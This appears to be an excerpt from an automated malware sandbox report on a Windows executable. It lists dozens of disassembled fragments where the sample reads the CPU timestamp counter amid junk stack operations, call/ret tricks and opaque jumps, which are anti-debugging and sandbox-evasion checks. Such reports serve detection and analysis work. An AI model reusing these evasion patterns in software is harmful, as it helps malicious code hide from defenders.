Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4F88E second address: E4F892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4F892 second address: E4F896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E50EDB second address: E50EF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FA0AD4759D6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E50EF0 second address: E50F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c jnc 00007FA0AD45510Ch 0x00000012 jne 00007FA0AD455109h 0x00000018 popad 0x00000019 push 00000000h 0x0000001b mov esi, 1F0908A0h 0x00000020 push 00000000h 0x00000022 or edi, dword ptr [ebp+122D18B4h] 0x00000028 or dword ptr [ebp+124540E0h], ecx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007FA0AD45510Ch 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E50F36 second address: E50F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A02 second address: E51A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A06 second address: E51A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A18 second address: E51A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A1E second address: E51A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A22 second address: E51A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5179F second address: E517AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A26 second address: E51A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA0AD455108h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007FA0AD45510Ah 0x0000002c push 00000000h 0x0000002e mov di, 84E8h 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 je 00007FA0AD45510Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A73 second address: E51A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E51A77 second address: E51A7C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E09F77 second address: E09F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E59CF0 second address: E59D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455116h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FA0AD45510Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FA0AD455108h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007FA0AD455111h 0x00000030 xor dword ptr [ebp+122D307Eh], eax 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FA0AD455108h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push 00000000h 0x00000055 movzx ebx, bx 0x00000058 mov edi, dword ptr [ebp+122D559Dh] 0x0000005e xchg eax, esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5AD1A second address: E5AD32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA0AD4759E0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5AD32 second address: E5AD9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jne 00007FA0AD455112h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 mov di, F595h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FA0AD455108h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D558Dh], edi 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA0AD455113h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E59EFB second address: E59EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E59EFF second address: E59F09 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5DD70 second address: E5DD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5E38A second address: E5E38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5E38E second address: E5E394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5AE76 second address: E5AE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5AE7A second address: E5AEA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA0AD4759EFh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5BFEF second address: E5BFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA0AD455106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5BFF9 second address: E5C099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007FA0AD4759F1h 0x0000000f nop 0x00000010 add dword ptr [ebp+12451578h], ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FA0AD4759D8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 xor dword ptr [ebp+122D301Eh], ebx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov bx, ax 0x00000047 mov eax, dword ptr [ebp+122D1191h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007FA0AD4759D8h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000016h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 push FFFFFFFFh 0x00000069 mov ebx, 3544E01Dh 0x0000006e nop 0x0000006f pushad 0x00000070 ja 00007FA0AD4759D8h 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 pop edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E5C099 second address: E5C0A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E603D7 second address: E603DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E61378 second address: E61381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E61438 second address: E61450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759DFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E623F8 second address: E62427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD45510Ch 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FA0AD455117h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E62427 second address: E6242B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E6535E second address: E65362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E662B0 second address: E662C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA0AD4759D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E662C0 second address: E662C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E673EF second address: E673F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E683E9 second address: E683EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E683EE second address: E683F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E64386 second address: E6438A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E6A478 second address: E6A48E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FA0AD4759F7h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E6A48E second address: E6A492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E69532 second address: E695C5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c js 00007FA0AD4759DEh 0x00000012 nop 0x00000013 mov bl, 91h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FA0AD4759D8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 jno 00007FA0AD4759DCh 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 xor edi, dword ptr [ebp+1244E119h] 0x00000049 mov eax, dword ptr [ebp+122D0B51h] 0x0000004f mov dword ptr [ebp+122D1DECh], ecx 0x00000055 push FFFFFFFFh 0x00000057 mov edi, 0C30E8A2h 0x0000005c nop 0x0000005d pushad 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 jl 00007FA0AD4759D6h 0x00000067 popad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FA0AD4759E3h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E6E629 second address: E6E633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA0AD455106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E6E633 second address: E6E640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7453A second address: E7453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7453E second address: E7455A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7455A second address: E7456D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA0AD455106h 0x0000000d jng 00007FA0AD455106h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E799E9 second address: E799EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E799EF second address: E799F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7B3D6 second address: E7B3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7B542 second address: E7B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7B54B second address: E7B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7B54F second address: E7B561 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FA0AD455108h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7B561 second address: E7B5A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FA0AD4759D6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jbe 00007FA0AD4759E0h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jg 00007FA0AD4759D6h 0x00000023 jmp 00007FA0AD4759E7h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7F7E1 second address: E7F7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7FB3F second address: E7FB61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA0AD4759E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E7FD03 second address: E7FD15 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FA0AD455106h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E80417 second address: E8041B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E8041B second address: E80442 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA0AD455106h 0x00000008 jmp 00007FA0AD45510Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FA0AD45510Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E84C3C second address: E84C66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA0AD4759E1h 0x0000000b push edi 0x0000000c jmp 00007FA0AD4759E0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E84DD0 second address: E84DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jns 00007FA0AD455113h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E84DEA second address: E84DEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E85535 second address: E8553E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E85AFB second address: E85B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E85B12 second address: E85B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E85B18 second address: E85B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA0AD4759E9h 0x00000008 jmp 00007FA0AD4759DDh 0x0000000d jmp 00007FA0AD4759E8h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E89136 second address: E8916A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Ch 0x00000007 jmp 00007FA0AD455116h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FA0AD45510Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E8916A second address: E8919B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA0AD4759DEh 0x00000010 jmp 00007FA0AD4759E2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E8919B second address: E891A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA0AD455106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E8DB24 second address: E8DB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E562A2 second address: E562A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E562A6 second address: E33A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FA0AD4759D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jmp 00007FA0AD4759DBh 0x0000002c lea eax, dword ptr [ebp+1248AFE6h] 0x00000032 nop 0x00000033 jne 00007FA0AD4759DEh 0x00000039 push eax 0x0000003a jmp 00007FA0AD4759E6h 0x0000003f nop 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FA0AD4759D8h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a call dword ptr [ebp+12454D4Ah] 0x00000060 pushad 0x00000061 jne 00007FA0AD4759DEh 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E56494 second address: E564C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA0AD45511Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jc 00007FA0AD455106h 0x00000013 pop esi 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E56875 second address: E568B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FA0AD4759E9h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA0AD4759DBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E568B1 second address: E568E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA0AD455114h 0x00000015 rdtsc
